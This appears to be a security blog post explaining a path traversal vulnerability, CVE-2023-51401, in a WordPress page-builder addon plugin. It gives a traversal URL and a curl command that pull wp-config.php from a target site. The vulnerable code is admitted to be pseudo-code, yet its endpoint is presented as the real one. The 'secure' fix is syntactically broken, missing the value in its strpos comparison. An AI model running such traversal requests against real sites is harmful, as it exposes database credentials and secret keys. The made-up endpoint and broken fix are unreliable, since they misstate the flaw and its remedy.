CVE-2023-51401 - Path Traversal in Ultimate Addons for Beaver Builder – How It Works, Exploit Details, and Mitigation

WordPress websites are frequent targets for hackers, and vulnerabilities in popular plugins can put thousands at risk. One recent example is CVE-2023-51401, a flaw found in the *Ultimate Addons for Beaver Builder* plugin by Brainstorm Force. In this post, we’ll break down what this vulnerability is, show how it’s exploited, share original references, and give code snippets so you can understand the issue in practical terms.

What is CVE-2023-51401?

CVE-2023-51401 refers to a Path Traversal vulnerability in Ultimate Addons for Beaver Builder (affecting versions up to 1.35.13). Put simply, it doesn’t properly check file paths, which allows attackers to access files outside the normal plugin directory by manipulating certain input parameters.

Vulnerability type: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Plugin affected: Ultimate Addons for Beaver Builder
Affected versions: All through 1.35.13 (no fixed version at the time of original disclosure)
Exploit type: Relative Path Traversal

Why Does This Matter?

With path traversal issues like CVE-2023-51401, attackers can read sensitive files like wp-config.php, or even other files outside the web root (depending on server configuration). This can expose database credentials, secret keys, and other data vital to your WordPress site’s security.

Vulnerable Function Example

Ultimate Addons for Beaver Builder lets users upload and manage files via the plugin backend. When certain file management features are used, the plugin takes user input that is supposed to indicate a filename or path.

Here’s a simplified code snippet showing the problem

// Pseudo-code based on common plugin patterns
$file = $_GET['file'];
$base_path = plugin_dir_path(__FILE__) . 'templates/';
$full_path = $base_path . $file;

// Vulnerable: No path validation!
if (file_exists($full_path)) {
    include($full_path);
}

If $file is set to something like ../../../../wp-config.php, the plugin will generate a path that points outside its intended directory. Since there is no check to see if $file is trying to escape the plugin directory, it’s possible to steal sensitive files.

Suppose a website using Ultimate Addons for Beaver Builder has the vulnerable endpoint

https://example.com/wp-admin/admin-ajax.php?action=uabb_get_template&file=default.php

An attacker can change the file parameter to climb up directories and access files like this

https://example.com/wp-admin/admin-ajax.php?action=uabb_get_template&file=../../../../wp-config.php

This will make the PHP code try to include the WordPress configuration file, possibly displaying sensitive information or exposing it to the browser.

You can use curl or any web request tool to exploit this vulnerability

curl "https://target-site.com/wp-admin/admin-ajax.php?action=uabb_get_template&file=../../../../wp-config.php";

If the plugin is unpatched and file permissions allow it, this could return the contents of wp-config.php.

Harden your web server to prevent PHP from accessing files outside the intended directories.

- Sanitize user input. On the developer side, always use functions like basename(), and verify requested files are within the allowed directory.

Example of Secure Code

// Securely resolve the requested path
$file = basename($_GET['file']); // strips directory paths
$allowed_dir = plugin_dir_path(__FILE__) . 'templates/';
$full_path = realpath($allowed_dir . $file);

// Only include if the file actually exists in the intended dir
if (strpos($full_path, $allowed_dir) ===  && file_exists($full_path)) {
    include($full_path);
} else {
    die('Access denied.');
}

References

- NVD - CVE-2023-51401
- WPScan Advisory
- Plugin homepage
- OWASP Path Traversal Cheat Sheet

Summary

CVE-2023-51401 is a critical path traversal issue in the Ultimate Addons for Beaver Builder plugin. It can allow attackers to read files anywhere on your web server by exploiting improper input validation. Keep your plugins updated, validate and sanitize all user input, and limit file access on your server wherever possible.

If you’re running this plugin, check your version, apply updates, and monitor for further security advisories. Stay safe!


*[This post is original content created to help WordPress users and developers understand CVE-2023-51401 and how to defend against it.]*

Timeline

Published on: 05/17/2024 09:15:16 UTC
Last modified on: 05/17/2024 18:36:05 UTC